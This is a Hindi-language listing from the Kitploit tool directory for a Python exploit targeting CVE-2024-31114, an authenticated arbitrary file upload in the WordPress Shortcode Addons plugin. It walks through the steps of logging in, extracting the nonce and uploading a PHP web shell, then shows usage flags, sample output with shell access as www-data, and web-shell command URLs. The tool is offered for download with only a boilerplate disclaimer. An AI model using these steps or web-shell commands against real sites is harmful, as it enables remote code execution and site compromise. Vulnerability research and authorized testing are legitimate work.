Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - प्रमाणित (Admin+) मनमानी फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-31114
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - प्रमाणित (Admin+) मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-31114 - वर्डप्रेस शॉर्टकोड ऐडऑन्स RCE एक्सप्लॉइट

शॉर्टकोड ऐडऑन्स <= 3.2.5 – प्रमाणित (एडमिन+) मनमानी फ़ाइल अपलोड
CVE आईडी: CVE-2024-31114
CVSS स्कोर: 9.1 (गंभीर)


🛠️ कमजोरी का विवरण

वर्डप्रेस के लिए शॉर्टकोड ऐडऑन्स – विज़ुअल कम्पोज़र, डिवी, बीवर बिल्डर और एलिमेंटर एक्सटेंशन प्लगइन फ़ाइल प्रकार सत्यापन के अभाव के कारण सभी संस्करणों 3.2.5 तक में मनमानी फ़ाइल अपलोड के लिए संवेदनशील है।

यह दोष प्रमाणित हमलावरों को जिनके पास प्रशासक-स्तरीय पहुँच या उच्चतर है को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है — जो रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।


🚀 स्क्रिप्ट विवरण

यह पायथन स्क्रिप्ट कमजोरी के शोषण को स्वचालित करती है। यह निम्न कार्य करती है:

  1. SSL सत्यापन अक्षम करना
  2. दिए गए क्रेडेंशियल्स से लॉगिन करना
  3. CSRF टोकन (_wpnonce) निकालना
  4. PHP शेल (nxploit.php) जनरेट करना
  5. इसे .zip के रूप में संपीड़ित और अपलोड करना
  6. अपलोड की पुष्टि करना और शेल तक पहुँचना
  • लक्ष्य सर्वर पर whoami निष्पादित करना

  • 🧪 उपयोग

    root@kitploit:~
    usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
    
    Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
    By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            Show this help message and exit
      -u, --url URL         Target URL (e.g. http://target.com)
      -un, --username USERNAME   WordPress Admin Username
      -p, --password PASSWORD    WordPress Admin Password
    

    📤 उदाहरण आउटपुट

    root@kitploit:~
    [+] Authentication successful.
    [+] _wpnonce extracted: 9d8dbbc630
    [+] Payload nxploit.zip created.
    [+] Payload uploaded.
    [+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
    [+] Command output:
    ------------------
    www-data
    ------------------
    [+] Temporary files removed.
    

    🐚 वेब शेल उपयोग

    पेलोड अपलोड होने के बाद, आप निम्नलिखित प्रारूप का उपयोग करके सिस्टम कमांड निष्पादित कर सकते हैं:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
    

    🔹 उदाहरण:

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
    

    यह सर्वर पर वर्तमान निर्देशिका की सामग्री सूचीबद्ध करेगा।


    ⚠️ अस्वीकरण

    यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
    लेखक इस स्क्रिप्ट के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

    जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।


    द्वारा: Nxploited | Khaled Alenazi

    टूल डाउनलोड करें